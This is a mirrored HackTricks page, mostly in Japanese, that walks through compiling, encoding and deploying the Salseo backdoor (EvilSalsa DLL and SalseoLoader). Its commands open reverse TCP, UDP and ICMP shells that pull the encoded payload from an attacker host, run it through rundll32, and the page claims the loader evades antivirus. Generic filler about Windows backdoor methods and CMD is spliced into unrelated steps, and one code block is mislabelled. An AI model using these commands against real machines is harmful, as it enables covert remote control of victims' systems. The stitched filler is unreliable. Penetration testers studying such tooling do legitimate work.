mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-13 14:53:03 +00:00
216 lines
14 KiB
Markdown
216 lines
14 KiB
Markdown
# Salseo
|
||
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
* **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||
* [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
|
||
* **ハッキングのトリックを共有するには、PRを** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **に提出してください。**
|
||
|
||
</details>
|
||
|
||
## バイナリのコンパイル
|
||
|
||
githubからソースコードをダウンロードし、**EvilSalsa**と**SalseoLoader**をコンパイルします。コードをコンパイルするには**Visual Studio**が必要です。
|
||
|
||
これらのプロジェクトを、使用するWindowsボックスのアーキテクチャに合わせてコンパイルしてください(Windowsがx64をサポートしている場合は、そのアーキテクチャにコンパイルします)。
|
||
|
||
Visual Studio内で、**左側の"Build"タブ**の**"Platform Target"**でアーキテクチャを**選択**できます。
|
||
|
||
(\*\*このオプションが見つからない場合は、**"Project Tab"**を押し、次に**"\<Project Name> Properties"**を押します)
|
||
|
||
![](<../.gitbook/assets/image (132).png>)
|
||
|
||
次に、両方のプロジェクトをビルドします(Build -> Build Solution)(ログ内に実行可能ファイルのパスが表示されます):
|
||
|
||
![](<../.gitbook/assets/image (1) (2) (1) (1) (1).png>)
|
||
|
||
## バックドアの準備
|
||
|
||
まず、**EvilSalsa.dll**をエンコードする必要があります。これには、pythonスクリプト**encrypterassembly.py**を使用するか、プロジェクト**EncrypterAssembly**をコンパイルすることができます:
|
||
|
||
### **Python**
|
||
```
|
||
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
|
||
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
|
||
```
|
||
### Windows
|
||
|
||
Windowsは、バックドアを作成するためのさまざまな方法を提供します。以下にいくつかの一般的な手法を紹介します。
|
||
|
||
#### リモートデスクトップ
|
||
|
||
リモートデスクトップ(RDP)は、Windowsマシンにリモートでアクセスするための機能です。バックドアを作成するために、攻撃者はRDPを利用してWindowsマシンにアクセスし、システムに対する制御を取得します。
|
||
|
||
#### バックドアアプリケーション
|
||
|
||
バックドアアプリケーションは、Windowsマシンにインストールされたアプリケーションの中に隠されたバックドア機能を持つものです。攻撃者は、バックドアアプリケーションを使用してWindowsマシンにアクセスし、システムに対する制御を取得します。
|
||
|
||
#### サービスの改ざん
|
||
|
||
Windowsでは、サービスと呼ばれるバックグラウンドプロセスが実行されています。攻撃者は、サービスの改ざんを行い、バックドアを作成します。これにより、攻撃者はWindowsマシンにアクセスし、システムに対する制御を取得することができます。
|
||
|
||
#### レジストリの改ざん
|
||
|
||
Windowsのレジストリは、システムの設定情報を格納しています。攻撃者は、レジストリの改ざんを行い、バックドアを作成します。これにより、攻撃者はWindowsマシンにアクセスし、システムに対する制御を取得することができます。
|
||
|
||
#### ファイルの改ざん
|
||
|
||
Windowsでは、重要なシステムファイルが存在します。攻撃者は、これらのファイルを改ざんし、バックドアを作成します。これにより、攻撃者はWindowsマシンにアクセスし、システムに対する制御を取得することができます。
|
||
|
||
これらは、Windowsでバックドアを作成するための一般的な手法の一部です。攻撃者は、これらの手法を使用してWindowsマシンに侵入し、システムに対する制御を取得することができます。
|
||
```
|
||
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
|
||
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
|
||
```
|
||
よし、これでSalseoのすべてを実行するために必要なものが揃いました: **エンコードされたEvilDalsa.dll**と**SalseoLoaderのバイナリ**です。
|
||
|
||
**SalseoLoader.exeバイナリをマシンにアップロードしてください。どのAVにも検出されないはずです...**
|
||
|
||
## **バックドアの実行**
|
||
|
||
### **TCPリバースシェルの取得(HTTPを介してエンコードされたdllをダウンロード)**
|
||
|
||
リバースシェルリスナーとHTTPサーバーを起動して、エンコードされたevilsalsaを提供することを忘れないでください。
|
||
```
|
||
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
|
||
```
|
||
### **UDPリバースシェルの取得(SMBを介してエンコードされたdllをダウンロードする)**
|
||
|
||
リバースシェルのリスナーとしてncを起動し、エンコードされたevilsalsaを提供するためのSMBサーバー(impacket-smbserver)を起動することを忘れないようにしてください。
|
||
```
|
||
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
|
||
```
|
||
### **ICMPリバースシェルの取得(既に被害者内にエンコードされたdllが存在する場合)**
|
||
|
||
**今回は、クライアント側でリバースシェルを受け取るための特別なツールが必要です。ダウンロードしてください:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)
|
||
|
||
#### **ICMP応答の無効化:**
|
||
```
|
||
sysctl -w net.ipv4.icmp_echo_ignore_all=1
|
||
|
||
#You finish, you can enable it again running:
|
||
sysctl -w net.ipv4.icmp_echo_ignore_all=0
|
||
```
|
||
#### クライアントを実行する:
|
||
|
||
```bash
|
||
./client
|
||
```
|
||
|
||
The client will connect to the server and wait for commands.
|
||
```
|
||
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
|
||
```
|
||
#### ターゲット内部で、salseoの実行を行います:
|
||
```
|
||
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
|
||
```
|
||
## DLLのエクスポートメイン関数としてのSalseoLoaderのコンパイル
|
||
|
||
Visual Studioを使用してSalseoLoaderプロジェクトを開きます。
|
||
|
||
### メイン関数の前に\[DllExport]を追加します。
|
||
|
||
![](<../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1).png>)
|
||
|
||
### このプロジェクトにDllExportをインストールします。
|
||
|
||
#### **ツール** --> **NuGetパッケージマネージャー** --> **ソリューションのNuGetパッケージを管理...**
|
||
|
||
![](<../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png>)
|
||
|
||
#### **DllExportパッケージを検索(ブラウズタブを使用)し、インストールボタンを押します(ポップアップを受け入れます)**
|
||
|
||
![](<../.gitbook/assets/image (4) (1) (1) (1) (1).png>)
|
||
|
||
プロジェクトフォルダには、**DllExport.bat**と**DllExport\_Configure.bat**のファイルが表示されます。
|
||
|
||
### DllExportをアンインストールします。
|
||
|
||
**アンインストール**を押します(はい、奇妙ですが、信じてください、必要です)
|
||
|
||
![](<../.gitbook/assets/image (5) (1) (1) (2) (1).png>)
|
||
|
||
### Visual Studioを終了し、DllExport\_configureを実行します。
|
||
|
||
Visual Studioを**終了**します。
|
||
|
||
次に、**SalseoLoaderフォルダ**に移動し、**DllExport\_Configure.bat**を実行します。
|
||
|
||
**x64**を選択します(x64ボックス内で使用する場合、私の場合はそうでした)、**System.Runtime.InteropServices**(**DllExportの名前空間内**)を選択し、**Apply**を押します。
|
||
|
||
![](<../.gitbook/assets/image (7) (1) (1) (1).png>)
|
||
|
||
### Visual Studioでプロジェクトを再度開きます。
|
||
|
||
**\[DllExport]**はもはやエラーとしてマークされません。
|
||
|
||
![](<../.gitbook/assets/image (8) (1).png>)
|
||
|
||
### ソリューションをビルドします。
|
||
|
||
**出力の種類 = クラスライブラリ**を選択します(プロジェクト --> SalseoLoaderのプロパティ --> アプリケーション --> 出力の種類 = クラスライブラリ)
|
||
|
||
![](<../.gitbook/assets/image (10) (1).png>)
|
||
|
||
**x64** **プラットフォーム**を選択します(プロジェクト --> SalseoLoaderのプロパティ --> ビルド --> プラットフォームのターゲット = x64)
|
||
|
||
![](<../.gitbook/assets/image (9) (1) (1).png>)
|
||
|
||
ソリューションを**ビルド**するには:ビルド --> ソリューションのビルド(出力コンソールに新しいDLLのパスが表示されます)
|
||
|
||
### 生成されたDLLをテストします。
|
||
|
||
テストしたい場所にDLLをコピーして貼り付けます。
|
||
|
||
実行するコマンド:
|
||
```
|
||
rundll32.exe SalseoLoader.dll,main
|
||
```
|
||
エラーが表示されない場合、おそらく機能するDLLを持っています!
|
||
|
||
## DLLを使用してシェルを取得する
|
||
|
||
**HTTPサーバー**を使用して、**ncリスナー**を設定することを忘れないでください。
|
||
|
||
### Powershell
|
||
```
|
||
$env:pass="password"
|
||
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
|
||
$env:lhost="10.2.0.5"
|
||
$env:lport="1337"
|
||
$env:shell="reversetcp"
|
||
rundll32.exe SalseoLoader.dll,main
|
||
```
|
||
### CMD
|
||
|
||
CMD (Command Prompt) is a command-line interpreter in Windows operating systems. It provides a way to interact with the operating system by executing commands. CMD can be used to perform various tasks, such as navigating through directories, running programs, managing files and folders, and configuring system settings.
|
||
|
||
CMD is a powerful tool for hackers as it allows them to execute commands and scripts to exploit vulnerabilities, gain unauthorized access, and perform various malicious activities on a target system. It provides a direct interface to the underlying operating system, giving hackers control over the system's resources and functionalities.
|
||
|
||
Hackers can use CMD to execute commands to gather information about the target system, such as network configuration, running processes, and user accounts. They can also use CMD to launch attacks, such as brute-forcing passwords, injecting malicious code, and creating backdoors for persistent access.
|
||
|
||
It is important for system administrators and users to be aware of the potential risks associated with CMD and take necessary precautions to secure their systems. Regularly updating the operating system, using strong passwords, and implementing security measures can help mitigate the risks associated with CMD-based attacks.
|
||
```
|
||
set pass=password
|
||
set payload=http://10.2.0.5/evilsalsax64.dll.txt
|
||
set lhost=10.2.0.5
|
||
set lport=1337
|
||
set shell=reversetcp
|
||
rundll32.exe SalseoLoader.dll,main
|
||
```
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
* **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||
* [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||
* **ハッキングのトリックを共有するには、PRを** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **に提出してください。**
|
||
|
||
</details>
|